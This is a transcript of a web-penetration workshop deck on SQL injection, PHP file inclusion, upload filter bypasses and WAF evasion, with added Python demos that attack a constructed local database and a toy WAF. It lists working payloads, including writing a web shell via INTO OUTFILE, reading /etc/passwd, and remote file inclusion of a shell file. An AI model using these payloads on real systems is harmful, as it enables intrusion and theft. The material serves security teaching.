Web滲透技巧(下) (Web Penetration Techniques, Part 2)
Lionbug
October 01, 2016
Research
The Declaration of Hacker (TDOH) WorkShop
Transcript
Web滲透技巧(下) (Web Penetration Techniques, Part 2) • 2016/10/01 @ TDOH WorkShop • LionBug
About Me • 讙紣Ռ a.k.a. LionBug • 褾ੜ of TDOH • Co-founder of UCCU • Know a little Web Security
Advanced vulnerability exploitation
SQL Injection
SQL Injection types • Union Based • Error Based • Blind Based • Time Based
SQL Injection contexts (where the input lands) • WHERE id = 1 • WHERE id = '1' • WHERE id = "1"
Tips for identifying the database • MySQL: version() • MSSQL: @@version • Oracle: v$version (table) • SQLite: sqlite_version()
Common functions • MySQL: version(), user(), database() • SQLite: sqlite_version() • MSSQL: @@version, user, db_name()
UNION Based • UNION merges the result sets of two SQL statements into one • both SELECTs must return the same number of columns
Tip: find the column count with ORDER BY • order by 1 • order by 100 • … (the largest index that does not error is the column count)
Notes • MySQL and SQLite convert column types automatically • MSSQL and Oracle require matching column types • …
Blind Based • infer from the different results a True or False condition produces • and 1=1 • and 1=0
Blind Based • SELECT * FROM news WHERE id = 1 and (SELECT length(username) FROM member LIMIT 1)=1 • SELECT * FROM news WHERE id = 1 and (SELECT length(username) FROM member LIMIT 1)=2
Blind Based • SELECT * FROM news WHERE id = 1 and (SELECT substr(username,1,1) FROM member LIMIT 1)='a' • SELECT * FROM news WHERE id = 1 and (SELECT substr(username,1,1) FROM member LIMIT 1)='b'
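The following is an added example, not code from the deck, that puts the UNION and Blind slides above into runnable form. It stands up a constructed SQLite database (the `news` and `member` tables and the `admin` row are made up for the demonstration) behind a deliberately vulnerable query, then finds the column count with ORDER BY, dumps a value with UNION SELECT, and recovers the same value one character at a time through a boolean oracle. SQLite has no SLEEP(), so the Time Based variant is not shown; it would only swap the oracle's row-count check for a timing check.

```python
import sqlite3
import string

# Constructed stand-in for the target's database; tables, rows and the "admin" user are made up.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE news (id INTEGER, title TEXT, body TEXT);
INSERT INTO news VALUES (1, 'Welcome', 'first post');
CREATE TABLE member (id INTEGER, username TEXT, password TEXT);
INSERT INTO member VALUES (1, 'admin', 's3cret');
""")

REQUESTS = {"count": 0}  # number of "HTTP requests" an attack has cost so far


def vulnerable_news(id_param):
    """Deliberately vulnerable: the id parameter is concatenated into WHERE id = ..."""
    REQUESTS["count"] += 1
    sql = "SELECT id, title, body FROM news WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def find_column_count(max_cols=50):
    """ORDER BY n works while n <= number of selected columns and errors beyond it."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_news(f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_dump(expr, table):
    """UNION SELECT with the same column count; id = -1 suppresses the genuine row."""
    cols = find_column_count()
    if not cols or cols < 2:
        raise RuntimeError("could not determine a usable column count")
    fillers = ["NULL"] * cols      # NULL unions with any column type
    fillers[1] = expr              # put the data in the column the page displays
    rows = vulnerable_news(f"-1 UNION SELECT {', '.join(fillers)} FROM {table}")
    return rows[0][1]


def oracle(condition):
    """Boolean oracle: the article renders only when the injected condition is true."""
    return len(vulnerable_news(f"1 AND ({condition})")) > 0


def blind_extract(column, table, charset=string.ascii_lowercase + string.digits + "_"):
    """Recover a value without seeing it: first its length, then each character."""
    length = None
    for n in range(1, 65):
        if oracle(f"(SELECT length({column}) FROM {table} LIMIT 1) = {n}"):
            length = n
            break
    if length is None:
        raise ValueError("value is empty or longer than 64 characters")
    value = ""
    for pos in range(1, length + 1):
        for ch in charset:
            if oracle(f"(SELECT substr({column}, {pos}, 1) FROM {table} LIMIT 1) = '{ch}'"):
                value += ch
                break
        else:
            raise ValueError(f"character {pos} is outside the charset")
    return value


if __name__ == "__main__":
    print("columns:", find_column_count())
    before = REQUESTS["count"]
    print("union  :", union_dump("username", "member"), "-", REQUESTS["count"] - before, "requests")
    before = REQUESTS["count"]
    print("blind  :", blind_extract("username", "member"), "-", REQUESTS["count"] - before, "requests")
```

The request counter makes the trade-off on the slides concrete: the UNION dump costs a handful of requests per value, while the blind path costs roughly length times half the charset, which is why UNION or error-based extraction is preferred whenever the page echoes query results.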
Time Based • infer from the response time • sleep • IF(MID(user(),1,1) = 'r', SLEEP(5), 0) • heavy query • BENCHMARK(100000000, rand())
Error Based • pull data out through error messages • ExtractValue(1,concat(0x7e,version())) • XPATH syntax error: '~5.5'
Maximizing SQL Injection • INTO OUTFILE '/var/www/shell.php' • LOAD_FILE('/etc/passwd')
PHP SQL Injection exploitation • common filter functions • addslashes() • mysql_escape_string() • mysql_real_escape_string() • magic_quotes_gpc = On • PHP 4 and PHP < 5.2.1 have known problems
Function comparison (table slide)
PHP SQL Injection exploitation • Select user From member Where id = 123 • 1 or 1=1 %23
Example
PHP SQL Injection exploitation • length truncation • input beyond 10 characters is cut off • adminxxxx' => adminxxxx\' => adminxxxx\ • where username = 'adminxxxx\'
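An added example (not from the deck) modelling the length-truncation slide above. PHP's addslashes() is reimplemented in Python, the 10-character limit and the `member` table are assumed for illustration, and a small MySQL-style literal scanner shows where the database actually ends the username string. SQLite is not used here because it does not treat backslash as an escape character; the scanner follows MySQL's rules.

```python
COLUMN_WIDTH = 10  # assumed width of the username column the application enforces


def addslashes(s):
    """Python model of PHP's addslashes(): backslash before ' " \\ and NUL."""
    out = []
    for ch in s:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def escape_then_truncate(username):
    """Order of operations on the slide: escape first, then cut to the column width.
    A quote near the limit leaves a dangling backslash at the end."""
    return addslashes(username)[:COLUMN_WIDTH]


def truncate_then_escape(username):
    """Safe order: cut first, then escape, so an escape sequence is never split."""
    return addslashes(username[:COLUMN_WIDTH])


def login_query(username, password, prepare):
    """Query built by string concatenation, as the vulnerable application does."""
    return (f"SELECT * FROM member WHERE username = '{prepare(username)}' "
            f"AND password = '{addslashes(password)}'")


def mysql_literal_end(sql, start):
    """Index just past the single-quoted literal opening at sql[start], following MySQL:
    a backslash escapes the next character and '' stands for one quote."""
    i = start + 1
    while i < len(sql):
        if sql[i] == "\\":
            i += 2
        elif sql[i] == "'":
            if sql[i + 1:i + 2] == "'":
                i += 2
            else:
                return i + 1
        else:
            i += 1
    return None  # unterminated literal: MySQL would raise a syntax error


def username_literal_and_tail(sql):
    """Split the query into the username literal MySQL sees and the SQL that follows it."""
    start = sql.index("'")
    end = mysql_literal_end(sql, start)
    return sql[start:end], sql[end:]


if __name__ == "__main__":
    attacker_user, attacker_pass = "adminxxxx'", "or 1=1 #"
    for prepare in (escape_then_truncate, truncate_then_escape):
        sql = login_query(attacker_user, attacker_pass, prepare)
        literal, tail = username_literal_and_tail(sql)
        print(prepare.__name__)
        print("  query  :", sql)
        print("  literal:", literal)
        print("  tail   :", tail)
```

With escape-then-truncate the trailing backslash escapes the closing quote, so the username literal swallows ` AND password = ` and the password field, which contains no quote and therefore passes addslashes() untouched, is parsed as SQL: `or 1=1 #` with the `#` commenting out the stray quote. Truncating before escaping keeps the literal intact; prepared statements avoid the problem entirely.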
Uploads restricted by filename
Getting around a block on uploading .PHP • .php3 .php4 .phtml • nginx / IIS misconfiguration • http://lionbug.tw/123.jpg/1.php • .htaccess
Maximizing Local File Inclusion
Local File Inclusion • include($_GET['file']); • RCE • ?file=php://input • ?file=expect://ls • RFI • ?file=http://lionbug.tw/shell.txt
Local File Inclusion • include($_GET['file'].'php'); • RCE • ?file=\\192.168.100.1\1.php • RFI • ?file=http://lionbug.tw/shell.php
LFI + Upload combo
LFI + Upload • the uploaded file must not be converted (re-encoded) by the server • include.php?file=upload/123.jpg • include.php?file=../../upload/123.jpg
LFI + PHPINFO combo
LFI + PHPINFO • PHP's upload mechanism • [tmp_name] => /tmp/phpGvjUMn • ?file=/tmp/phpGvjUMn • race against the deletion of the temporary file
PHPINFO
Apps: another paradise
App angles • beta.lionbug.tw • debug output left enabled • Facebook once had a password-reset PIN brute-force • many web vulnerabilities are easier to find • hidden APIs
App angles • old versions • /v2/login • /v1/login <- protection forgotten • …
WAF: web application firewall
CloudFlare • 360 • 安全狗 (SafeDog)
(image slide)
WAF • DNS-based WAF (CloudFlare) • appliance WAF • software WAF (安全狗, 360 …) • …
Brute-force WAF detection • no response • an "attack detected" page • redirected • …
Bypass the WAF? Why bother, go straight to the origin host
Getting around a DNS WAF • the origin IP • Google • DNS history • information leaks • brute force • IP scanning • DDoS
Getting around a DNS WAF • attack from the internal network • services hosted internally • exploit a vulnerability • SSRF (Server-Side Request Forgery) • …
(image slide)
General WAF bypasses • TCP fragmentation • oversized packets • 1 and 111…111 • malformed requests • case switching • SeLECt 1 FroM …
General WAF bypasses • HTTP parameter pollution • PHP/Apache: par1=var2 (last value wins) • a=1&a=1 or 1 • JSP/Tomcat: par1=var1 (first value wins) • ASP/IIS: par1=var1,var2 (values joined with a comma) • a=1'&a=or 1--
General WAF bypasses • special characters • null byte • a=%00' or '1 • regexes that match one line at a time • \r \n • a=%0a' or '1
General WAF bypasses • encoding • URL encoding • Unicode • Chinese-character encoding
Bypassing with Chinese characters: see Orange's HITCON 2015 talk, http://hitcon.org/2015/CMT/download/day1-c-r0.pdf
MySQL Bypass WAF
MySQL Bypass WAF • whitespace substitution • select%0auser%0dfrom%09member • select(user)from(member) • select+user+from+member
MySQL Bypass WAF • comments • select/**/user/**/from/**/member • /*!5000select 1*/ • admin where id=1`xxxx
MySQL Bypass WAF • substitutions • CONCAT -> CONCAT_WS • '/etc/passwd' -> 0x2f6574632f706173737764 • 1=1 -> 1>0 • 1=1 -> 1
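An added example (not from the deck) that ties the General and MySQL bypass slides together: a toy WAF with the weaknesses those slides exploit (inspects only the first occurrence of a parameter, decodes once, matches case-sensitively, and its `.` cannot cross a newline), the same payloads getting through it, the differing backend views of a duplicated parameter, and a hardened inspection path that normalises first. The rules, payloads and platform behaviours are simplified assumptions constructed for the demonstration, not any vendor's signatures.

```python
import re
from urllib.parse import unquote

# Toy signatures (constructed for this example, not a vendor's rule set).
RULES = [
    r"\bselect\b.*\bfrom\b",
    r"\bunion\b.*\bselect\b",
    r"\bor\b\s+\d+\s*=\s*\d+",
]


def _pairs(raw_query):
    """Yield (name, raw_value) for every parameter in the order sent."""
    for pair in raw_query.split("&"):
        name, _, value = pair.partition("=")
        yield name, value


def naive_waf_blocks(raw_query):
    """Weak inspection: first occurrence of each name only, a single round of
    percent-decoding, case-sensitive rules, and '.' that stops at a newline."""
    first = {}
    for name, value in _pairs(raw_query):
        first.setdefault(name, unquote(value))
    return any(re.search(rule, value) for value in first.values() for rule in RULES)


def backend_value(raw_query, name, platform):
    """What the application receives for a repeated parameter (modelled behaviours)."""
    values = [unquote(v) for n, v in _pairs(raw_query) if n == name]
    if platform == "php":    # PHP/Apache: the last occurrence wins
        return values[-1]
    if platform == "jsp":    # JSP/Tomcat: the first occurrence wins
        return values[0]
    if platform == "asp":    # ASP/IIS: all occurrences joined with commas
        return ",".join(values)
    raise ValueError(f"unknown platform {platform!r}")


def normalize(value):
    """Canonical form for inspection: decode until stable, lowercase, keep the body of
    MySQL /*!...*/ version comments (the server executes them), drop ordinary comments,
    and fold every run of whitespace (including CR, LF, TAB) into one space."""
    prev = None
    while value != prev:
        prev, value = value, unquote(value)
    value = value.lower()
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.S)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value)


def hardened_waf_blocks(raw_query):
    """Inspect every occurrence of every parameter plus the comma-joined form an
    ASP/IIS backend would see, each normalised first."""
    by_name = {}
    for name, value in _pairs(raw_query):
        by_name.setdefault(name, []).append(value)
    candidates = []
    for values in by_name.values():
        candidates.extend(values)
        candidates.append(",".join(values))
    return any(re.search(rule, normalize(c), flags=re.S)
               for c in candidates for rule in RULES)


# Constructed payloads, one per technique on the slides.
PAYLOADS = {
    "parameter pollution": "id=1&id=-1%20union%20select%201,2,3",
    "case switching":      "q=SeLECt%201%20FroM%20dual",
    "whitespace/newline":  "q=select%0auser%0dfrom%09member",
    "double encoding":     "q=%2573elect%201%20from%20dual",
    "version comment":     "q=/*!50000select*/%201%20from%20dual",
}

if __name__ == "__main__":
    for name, query in PAYLOADS.items():
        print(f"{name:20} naive={naive_waf_blocks(query)!s:5} hardened={hardened_waf_blocks(query)}")
    print("php backend sees:", backend_value(PAYLOADS["parameter pollution"], "id", "php"))
```

Each bypass is a disagreement between what the WAF inspects and what the backend executes: which occurrence of a parameter counts, how many decoding passes are applied, whether case and comment syntax are canonicalised, and whether a newline stops the match. The hardened path closes each gap by inspecting every representation the backend could end up with rather than a single raw string.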
Upload Bypass WAF
Parameter pollution (1)
Parameter pollution (2)
Malformed requests (1)
Upload Bypass WAF • malformed requests (2) • filename=123.php • filename='123.php' • filename="123.jpg • a different Content-Type • application/x-www-form-urlencoded • multipart/form-data
Upload Bypass WAF • pad the request with junk • a=<large file>, file=123.php
Other Bypass WAF
Other Bypass WAF • LFI • ../../ • .//../././../
Useless trick • User-Agent: sqlmap • you will find a lot of sites stop letting you in XDD
Q & A